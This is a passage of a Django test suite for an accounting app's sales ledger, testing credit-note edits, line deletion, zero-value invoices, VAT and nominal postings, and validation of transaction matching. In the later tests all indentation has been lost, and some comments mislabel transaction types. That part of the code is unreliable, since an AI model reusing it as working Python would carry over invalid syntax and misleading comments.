            -2400
        )
        nom_trans = NominalTransaction.objects.all()
        self.assertEqual(
            len(nom_trans),
            20 + 20 + 20
        )
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        header = headers[0]
        # Pre-edit sanity checks: every vat transaction mirrors its line
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
        # Each line points at its three nominal transactions (g, v, t triplets)
        for i, line in enumerate(lines):
            self.assertEqual(line.header, header)
            self.assertEqual(line.line_no, i + 1)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        goods_nom_trans = nom_trans[::3]
        vat_nom_trans = nom_trans[1::3]
        total_nom_trans = nom_trans[2::3]
        for i, tran in enumerate(goods_nom_trans):
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
            self.assertEqual(
                lines[i].goods_nominal_transaction,
                tran
            )
        for i, tran in enumerate(vat_nom_trans):
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
            self.assertEqual(
                lines[i].vat_nominal_transaction,
                tran
            )
        for i, tran in enumerate(total_nom_trans):
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
            self.assertEqual(
                lines[i].total_nominal_transaction,
                tran
            )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Build the edit form: last line is flagged for deletion via DELETE
        data = {}
        header_data = create_header(
            HEADER_FORM_PREFIX,
            {
                "type": header.type,
                "customer": header.customer.pk,
                "period": header.period.pk,
                "ref": header.ref,
                "date": header.date.strftime(DATE_INPUT_FORMAT),
                "due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
                "total": -1 * header.total - 120 # the deleted last line removes goods 100 + vat 20
            }
        )
        data.update(header_data)
        lines_as_dicts = [ to_dict(line) for line in lines ]
        line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
        line_forms = line_trans
        for form in line_forms:
            form["goods"] *= -1
            form["vat"] *= -1
        line_forms[-1]["goods"] = 100
        line_forms[-1]["vat"] = 20
        line_forms[-1]["DELETE"] = "yes"
        line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
        line_data["line-INITIAL_FORMS"] = 20
        data.update(line_data)
        matching_data = create_formset_data(match_form_prefix, [])
        data.update(matching_data)
        url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
        response = self.client.post(url, data)
        # Post-edit checks: one line gone, totals fall by 120
        headers = SaleHeader.objects.all()
        self.assertEqual(len(headers), 1)
        self.assertEqual(
            headers[0].total,
            -2280
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            -2280
        )
        nom_trans = NominalTransaction.objects.all()
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        self.assertEqual(
            len(nom_trans),
            19 + 19 + 19
        )
        header = headers[0]
        lines = (
            SaleLine.objects
            .select_related("vat_code")
            .all()
            .order_by("pk")
        )
        self.assertEqual(
            len(lines),
            19
        )
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            19
        )
        vat_transactions = list(vat_transactions)
        lines = list(lines)
        unedited_lines = list(lines)[:-1]
        for i, line in enumerate(unedited_lines):
            self.assertEqual(line.header, header)
            self.assertEqual(line.line_no , i + 1)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        goods_nom_trans = nom_trans[::3]
        vat_nom_trans = nom_trans[1::3]
        total_nom_trans = nom_trans[2::3]
        unedited_goods_nom_trans = goods_nom_trans
        # CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
        for tran in unedited_goods_nom_trans:
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
        unedited_vat_nom_trans = vat_nom_trans
        for tran in unedited_vat_nom_trans:
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
        unedited_total_nom_trans = total_nom_trans
        for tran in unedited_total_nom_trans:
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Double entry must still balance to zero across all nominal transactions
        total = 0
        for tran in nom_trans:
            total = total + tran.value
        self.assertEqual(
            total,
            0
        )
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
# CORRECT USAGE
# DELETE ALL THE LINES SO IT IS A ZERO INVOICE
    def test_non_zero_invoice_is_changed_to_zero_invoice_by_deleting_all_lines(self):
        """
        Edit a posted credit note of 20 identical lines so that EVERY
        line form is flagged DELETE, turning it into a zero-value
        transaction.

        A zero-value transaction must be fully matched, so the edit form
        also matches against two cancelling headers.  Expected outcome:
        all lines, nominal transactions and vat transactions are removed,
        the header totals become 0, and two matching records exist.
        """
        self.client.force_login(self.user)
        # Post a credit note with 20 identical lines and matching nominal entries
        create_credit_note_with_nom_entries(
            {
                "type": "sc",
                "customer": self.customer,
                "period": self.period,
                "ref": self.ref,
                "date": self.model_date,
                "due_date": self.model_due_date,
                "total": 2400,
                "paid": 0,
                "due": 2400,
                "goods": 2000,
                "vat": 400
            },
            [
                {
                    'description': self.description,
                    'goods': 100,
                    'nominal': self.nominal,
                    'vat_code': self.vat_code,
                    'vat': 20
                }
            ] * 20,
            self.vat_nominal,
            self.sale_control
        )
        headers = SaleHeader.objects.all().order_by("pk")
        lines = SaleLine.objects.all().order_by("pk")
        self.assertEqual(
            len(lines),
            20
        )
        create_vat_transactions(headers[0], lines)
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            20
        )
        self.assertEqual(
            len(headers),
            1
        )
        self.assertEqual(
            headers[0].total,
            -2400
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            -2400
        )
        nom_trans = NominalTransaction.objects.all()
        self.assertEqual(
            len(nom_trans),
            20 + 20 + 20
        )
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        header = headers[0]
        # Pre-edit sanity checks: every vat transaction mirrors its line
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
        # Each line points at its three nominal transactions (g, v, t triplets)
        for i, line in enumerate(lines):
            self.assertEqual(line.line_no, i + 1)
            self.assertEqual(line.header, header)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        goods_nom_trans = nom_trans[::3]
        vat_nom_trans = nom_trans[1::3]
        total_nom_trans = nom_trans[2::3]
        for i, tran in enumerate(goods_nom_trans):
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
            self.assertEqual(
                lines[i].goods_nominal_transaction,
                tran
            )
        for i, tran in enumerate(vat_nom_trans):
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
            self.assertEqual(
                lines[i].vat_nominal_transaction,
                tran
            )
        for i, tran in enumerate(total_nom_trans):
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
            self.assertEqual(
                lines[i].total_nominal_transaction,
                tran
            )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Build the edit form: every line form flagged DELETE, total 0
        data = {}
        header_data = create_header(
            HEADER_FORM_PREFIX,
            {
                "type": header.type,
                "customer": header.customer.pk,
                "period": header.period.pk,
                "ref": header.ref,
                "date": header.date.strftime(DATE_INPUT_FORMAT),
                "due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
                "total": 0
            }
        )
        data.update(header_data)
        lines_as_dicts = [ to_dict(line) for line in lines ]
        line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
        line_forms = line_trans
        for form in line_forms:
            form["goods"] *= -1
            form["vat"] *= -1
        for form in line_forms:
            form["DELETE"] = "yes"
        line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
        line_data["line-INITIAL_FORMS"] = 20
        data.update(line_data)
        # WE HAVE TO MATCH OTHERWISE IT WILL ERROR
        headers_to_match_against = create_cancelling_headers(2, self.customer, "match", "sc", -100, self.period)
        headers_to_match_against_orig = headers_to_match_against
        headers_as_dicts = [ to_dict(header) for header in headers_to_match_against ]
        headers_to_match_against = [ get_fields(header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts ]
        matching_forms = []
        matching_forms += add_and_replace_objects([headers_to_match_against[0]], {"id": "matched_to"}, {"value": 100})
        matching_forms += add_and_replace_objects([headers_to_match_against[1]], {"id": "matched_to"}, {"value": -100})
        matching_data = create_formset_data(match_form_prefix, matching_forms)
        data.update(matching_data)
        url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
        response = self.client.post(url, data)
        # Post-edit checks: the credit note is now zero-valued and empty
        headers = SaleHeader.objects.all().order_by("pk")
        self.assertEqual(len(headers), 3)
        self.assertEqual(
            headers[0].total,
            0
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            0
        )
        nom_trans = NominalTransaction.objects.all()
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        self.assertEqual(
            len(nom_trans),
            0
        )
        header = headers[0]
        lines = (
            SaleLine.objects
            .select_related("vat_code")
            .all()
            .order_by("pk")
        )
        self.assertEqual(
            len(lines),
            0
        )
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            0
        )
        vat_transactions = list(vat_transactions)
        lines = list(lines)
        # The zero-value header is fully matched against the two cancelling headers
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            2
        )
        self.assertEqual(
            matches[0].matched_by,
            headers[0]
        )
        self.assertEqual(
            matches[0].matched_to,
            headers[1]
        )
        self.assertEqual(
            matches[0].value,
            -100
        )
        self.assertEqual(
            matches[1].matched_by,
            headers[0]
        )
        self.assertEqual(
            matches[1].matched_to,
            headers[2]
        )
        self.assertEqual(
            matches[1].value,
            100
        )
# CORRECT USAGE
def test_change_zero_invoice_to_a_non_zero_invoice(self):
self.client.force_login(self.user)
header = SaleHeader.objects.create(
**{
"type": "sc",
"customer": self.customer,
"period": self.period,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"goods": 0,
"vat": 0,
"total": 0,
"paid": 0,
"due": 0
}
)
headers_to_match_against = create_cancelling_headers(2, self.customer, "match", "sc", -100, self.period)
match(header, [ (headers_to_match_against[0], -100), (headers_to_match_against[1], 100) ] )
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
self.assertEqual(
headers[0].total,
0
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[0]
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
-100
)
self.assertEqual(
matches[1].matched_by,
headers[0]
)
self.assertEqual(
matches[1].matched_to,
headers[2]
)
self.assertEqual(
matches[1].value,
100
)
header = headers[0]
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": 2400
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
] * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
# WE HAVE TO MATCH OTHERWISE IT WILL ERROR
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [ to_dict(header) for header in headers_to_match_against ]
headers_to_match_against = [ get_fields(header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts ]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {"id": "matched_to"}, {"value": -100})
matching_forms[0]["id"] = matches[0].pk
matching_forms[1]["id"] = matches[1].pk
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 2
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": header.pk})
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
self.assertEqual(
headers[1].total,
-100
)
self.assertEqual(
headers[1].paid,
-100
)
self.assertEqual(
headers[1].due,
0
)
self.assertEqual(
headers[2].total,
100
)
self.assertEqual(
headers[2].paid,
100
)
self.assertEqual(
headers[2].due,
0
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
nom_trans = NominalTransaction.objects.all().order_by("pk")
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
for i, line in enumerate(lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[0]
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
-100
)
self.assertEqual(
matches[1].matched_by,
headers[0]
)
self.assertEqual(
matches[1].matched_to,
headers[2]
)
self.assertEqual(
matches[1].value,
100
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
def test_new_matched_value_is_ok_for_transaction_being_edited_but_not_for_matched_transaction_1(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
# Credit Note for 120.00
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "si",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.00
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.00,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
2
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -0.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': -0.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[0].type,
"ref": headers[0].ref,
"total": headers[0].total * -1,
"paid": headers[0].paid * -1,
"due": headers[0].due * -1,
"matched_by": '',
"matched_to": headers[0].pk,
"value": headers[0].total * -1,
})
matching_forms.append({
"type": headers[1].type,
"ref": headers[1].ref,
"total": headers[1].total,
"paid": headers[1].paid,
"due": headers[1].due,
"matched_by": '',
"matched_to": headers[1].pk,
"value": headers[1].total,
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[2]
)
self.assertEqual(
matches[0].matched_to,
headers[0]
)
self.assertEqual(
matches[0].value,
two_dp(-120.01)
)
self.assertEqual(
matches[1].matched_by,
headers[2]
)
self.assertEqual(
matches[1].matched_to,
headers[1]
)
self.assertEqual(
matches[1].value,
120
)
# Now for the edit. In the UI the match value shows as -120.01. In the DB it shows as 120.01
# We want to change the value to 110.01. This isn't ok because the -0.01 invoice can only be
# matched for 0 and full value. The edit will mean the matched will be outside this.
lines = SaleLine.objects.filter(header=headers[0]).all()
self.assertEqual(
len(lines),
1
)
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_forms[0]["id"] = lines[0].pk
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 1
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[2].type,
"ref": headers[2].ref,
"total": headers[2].total * -1,
"paid": headers[2].paid * -1,
"due": headers[2].due * -1,
"matched_by": headers[2].pk,
"matched_to": headers[0].pk,
"value": '-110.01',
"id": matches[0].pk
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 1
data.update(matching_data)
response = self.client.post(reverse("sales:edit", kwargs={"pk": headers[0].pk}), data)
self.assertEqual(
response.status_code,
200
)
# INCORRECT USAGE
def test_new_matched_value_is_ok_for_transaction_being_edited_but_not_for_matched_transaction_2(self):
self.client.force_login(self.user)
# Create an invoice for 120.01 through view first
# Second create a credit note for 120.00
# Third create an invoice for -0.01 and match the other two to it
# Invalid edit follows
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
# Credit Note for 120.00
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "si",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.00
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.00,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
2
)
# Invoice for -0.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -0.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': -0.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[0].type,
"ref": headers[0].ref,
"total": headers[0].total * -1,
"paid": headers[0].paid * -1,
"due": headers[0].due * -1,
"matched_by": '',
"matched_to": headers[0].pk,
"value": headers[0].total * -1,
})
matching_forms.append({
"type": headers[1].type,
"ref": headers[1].ref,
"total": headers[1].total,
"paid": headers[1].paid,
"due": headers[1].due,
"matched_by": '',
"matched_to": headers[1].pk,
"value": headers[1].total,
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[2]
)
self.assertEqual(
matches[0].matched_to,
headers[0]
)
self.assertEqual(
matches[0].value,
two_dp(-120.01)
)
self.assertEqual(
matches[1].matched_by,
headers[2]
)
self.assertEqual(
matches[1].matched_to,
headers[1]
)
self.assertEqual(
matches[1].value,
120
)
# Now for the edit. In the UI the match value shows as -120.01. In the DB it shows as 120.01
# We want to change the value to 110.01. This isn't ok because the -0.01 invoice can only be
# matched for 0 and full value. The edit will mean the matched will be outside this.
lines = SaleLine.objects.filter(header=headers[0]).all()
self.assertEqual(
len(lines),
1
)
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_forms[0]["id"] = lines[0].pk
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 1
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[2].type,
"ref": headers[2].ref,
"total": headers[2].total * -1,
"paid": headers[2].paid * -1,
"due": headers[2].due * -1,
"matched_by": headers[2].pk,
"matched_to": headers[0].pk,
"value": '-120.02',
"id": matches[0].pk
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 1
